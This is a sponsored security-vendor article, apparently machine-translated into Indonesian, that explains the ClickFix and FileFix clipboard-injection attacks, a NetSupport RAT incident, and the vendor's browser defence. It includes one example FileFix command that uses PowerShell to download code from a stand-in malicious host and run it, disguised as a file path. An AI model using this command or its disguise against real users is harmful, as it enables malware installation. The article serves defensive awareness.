Pandangan bagian dalam pada kampanye clickfix dan serangan dunia nyata, iterasi berikutnya (filefix), dan bagaimana mencegahnya di jalurnya, sebelum kompromi perangkat.
Clickfix: Menyalin diam ke clipboard
ClickFix, taktik rekayasa sosial yang menipu, digunakan oleh aktor ancaman untuk memanipulasi pengguna yang tidak curiga agar tanpa disadari memungkinkan halaman web secara diam -diam mengisi clipboard.
Pada akhirnya, penyerang berusaha membuat pengguna (tanpa sadar) menjalankan kode jahat, dikumpulkan dari browser dan diam -diam ditempatkan ke dalam clipboard pengguna, pada mesin host.
Diciptakan pada awalnya sebagai “clickfix” karena permintaan rekayasa sosial memberi tahu pengguna bahwa mereka harus “memperbaiki” masalah dengan browser mereka dan mengharuskan pengguna untuk mengklik elemen, istilah ini sekarang dianggap berasal dari serangan serupa, salah satu di mana pengguna mengklik elemen, halaman tersebut kemudian mengisi clipboard korban, dan mereka menginstruksikan pengguna untuk menempelkan kode termalus ke dalam perangkat mereka ke dalam perangkat mereka.
Tangkapan layar di atas menunjukkan contoh serangan clickfix. Setelah pengguna mengklik captcha palsu, halaman secara diam -diam mengisi clipboard pengguna dengan kode jahat. Kemudian menampilkan instruksi bagi pengguna untuk membuktikan bahwa mereka adalah manusia – dengan menempel (kode jahat) ke dialog Windows Run.
Untuk informasi lebih lanjut tentang ClickFix, lihat artikel kami yang menjelaskan apa, mengapa, di mana, dan bagaimana clickfix.
Hentikan serangan clickfix di mana mereka mulai: di browser
Tetap sadar, platform keamanan browser yang dibangun khusus, mendeteksi interaksi menipu secara real time, tepat di mana itu terjadi.
Dengan memantau pola akses clipboard, menandai halaman web yang mencurigakan, dan mengganggu teknik gerakan lateral seperti clickfix, tetap sadar organisasi untuk menutup serangan sebelum mereka meninggalkan browser dan mencapai host.
Serangan Dunia Nyata: Hasil Google untuk upaya clickfix
Pelanggan Keep Award baru -baru ini mengalami serangan clickfix di alam liar. Saat menjelajahi hasil mesin pencari, pengguna mengklik situs yang dikompromikan. Situs ini, yang disuntikkan dengan JavaScript berbahaya, memberikan prompt clickfix, pada akhirnya untuk tujuan menyebarkan backdoor tikus NetsupportManager.
Pengguna telah mengklik prompt, memungkinkan halaman untuk mengisi clipboard (dengan PowerShell berbahaya), dan menginstruksikan pengguna untuk menempel ke terminal perangkat.
Namun, tetap sadar diidentifikasi, diblokir, dan memperingatkan pengguna perintah yang mencurigakan halaman yang berusaha mengisi clipboard dengan, secara efektif mencegah kompromi perangkat.
Video di bawah ini berjalan melalui apa yang dialami pengunjung di situs yang dikompromikan ini – bingkai verifikasi captcha palsu. Setelah mengklik captcha palsu, JavaScript berbahaya memperbarui clipboard pengguna dengan kode PowerShell berbahaya dan meminta pengguna untuk menempelkannya ke dialog Windows Run.
Di bawah ini adalah panduan dari apa yang akan terjadi jika perlindungan tetap tidak ada di tempat untuk membatasi tindakan pengguna dan menghapus papan klip pengguna.
Jika taktik rekayasa sosial berhasil dan tidak ada kontrol teknis yang ada, pengguna akan secara tidak sadar mengeksekusi kode PowerShell berbahaya.
Tendangan ini dari serangkaian unduhan, de-mengamati, merakit malware pada mesin host, dan menyiapkan kegigihan di kunci registri yang dijalankan pengguna-memungkinkan malware untuk bertahan pada perangkat yang dikompromikan dan menjalankan setiap kali pengguna masuk ke akun komputer mereka.
Untuk detail spesifik tentang serangan dunia nyata ini, termasuk cradle unduhan awal dan kode PowerShell berikutnya, lihat kami Panduan langkah demi langkah.
Dampak: Tikus, pencuri, dan banyak lagi
Serangan ClickFix menggunakan javascript berbahaya, manipulasi clipboard, dan rekayasa sosial untuk akhirnya mendapatkan akses penyerang dari browser ke perangkat host.
Telah terlihat pada halaman web jahat dan dikompromikan dan telah digunakan oleh beberapa kelompok ancaman untuk mendapatkan akses ke mesin korban, pada akhirnya menggunakan malware dan akses jarak jauh (tikus), termasuk Asyncrat, pencuri skuld, pencuri lumma, malware darkgate, pencuri danabot, dan banyak lagi.
Ketika dibiarkan tidak terpengaruh oleh pertahanan teknis, serangan clipboard yang tampaknya sederhana ini dapat meningkat menjadi kompromi sistem penuh, memberikan remote control aktor ancaman, akses ke data sensitif, dan pijakan persisten yang sulit dideteksi dan bahkan lebih sulit untuk dihapus.
Gen berikutnya: Filefiks
FileFix adalah iterasi berikutnya, saudara kandung yang lebih muda, dari ClickFix-serangan manipulasi clipboard lainnya yang dirancang untuk menipu pengguna ke dalam menjalankan kode di luar konteks browser. Pertama kali didokumentasikan oleh peneliti keamanan Mr.D0X pada akhir Juni tahun ini, FileFix menipu pengguna untuk menempelkan perintah langsung ke bilah alamat File Explorer, dan aktor ancaman sudah mengadopsi teknik yang lebih baru ini.
Sekilas, output yang ditempel terlihat tidak berbahaya, seperti jalur file Windows standar. Tapi tersembunyi di awal adalah perintah jahat; “Jalur file” yang mengikuti adalah komentar, menyamarkan ancaman nyata.
Powershell.exe -c "iwr malicious[.]site/mal.jpg|iex" # C:OrganizationInternalDriveBusiness-RFP.pdf
Data lengkap yang disalin ke clipboard pengguna adalah perintah PowerShell berbahaya yang berakhir dengan komentar yang berisi jalur file.
Perhatikan pada gambar di bawah ini, bagaimana jalur file yang tampaknya tidak berbahaya di bilah alamat Explorer tidak menunjukkan PowerShell yang sebenarnya disembunyikan dari tampilan pengguna.
Seperti ClickFix, serangan Filefix berasal dari browser dan bergantung pada rekayasa sosial, injeksi clipboard, dan tindakan pengguna untuk melintasi batas antara browser dan host. FileFix, pada intinya, adalah serangan clickFix khusus untuk menggunakan File Explorer.
- Keduanya terjadi dalam konteks browser.
- Keduanya menggunakan teknik populasi clipboard yang sama.
- Keduanya memanfaatkan situs web berbahaya dan terganggu, mengaburkan batas antara lalu lintas web tepercaya dan berbahaya.
- Keduanya mengarah ke akses penyerang di perangkat host.
Ini berarti bahwa file dapat dihentikan dengan cara yang sama clickFix adalah: dengan pertahanan asli browser. Solusi keamanan browser, seperti tetap sadar, mendeteksi upaya populasi clipboard secara real-time dan mencegat kode mencurigakan sebelum mencapai perangkat host. Inilah sebabnya mengapa memiliki kebijakan yang dibangun ke dalam browser memastikan bahwa kompromi disimpan di teluk.
Keamanan browser mengambil panggung utama
Serangan ClickFix dan Filefix mengungkapkan titik buta kritis dalam banyak strategi keamanan: browser sebagai vektor untuk kompromi host. Teknik berbasis clipboard ini menggunakan rekayasa sosial dan menyalahgunakan interaksi pengguna dengan situs web yang tampaknya sah, atau bahkan dikompromikan, untuk mengirimkan kode berbahaya.
Tanpa visibilitas ke aktivitas browser atau kontrol atas akses clipboard, pertahanan tradisional kehilangan tanda -tanda awal. Tetapi dengan wawasan asli browser dan perlindungan clipboard real-time, organisasi dapat mencegat serangan ini di sumbernya, sebelum kode apa pun dieksekusi pada host.
Di Keep Sadar, kami telah melihat secara langsung bagaimana alat keamanan tradisional gagal dalam hal melindungi browser – yang diandalkan oleh karyawan antarmuka utama dan dieksploitasi oleh penyerang. Itu sebabnya kami membangun platform kami: untuk mendeteksi dan memblokir manipulasi clipboard dan serangan berbasis browser lainnya sebelum mereka dapat menyebabkan kerusakan nyata.
Tertarik belajar lebih banyak? Jangan ragu meminta demo di sini.
Selain itu, kami bangga dinobatkan sebagai salah satu dari adil empat Black Hat USA 2025 Finalis Spotlight Startup Untuk inovasi, dan kami tetap berkomitmen untuk mendefinisikan kembali bagaimana organisasi mengamankan dan mengelola browser – tempat di mana pekerjaan saat ini dimulai, dan di mana serangan saat ini sering dimulai.
Jika Anda akan menghadiri Black Hat USA 2025 minggu depan, saksikan kami naik panggung untuk membuat pitch kami, mampirlah ke stan Keep Award, atau Jadwalkan waktu untuk mengobrol dengan tim di acara tersebut.
Disponsori dan ditulis oleh Tetap sadar.
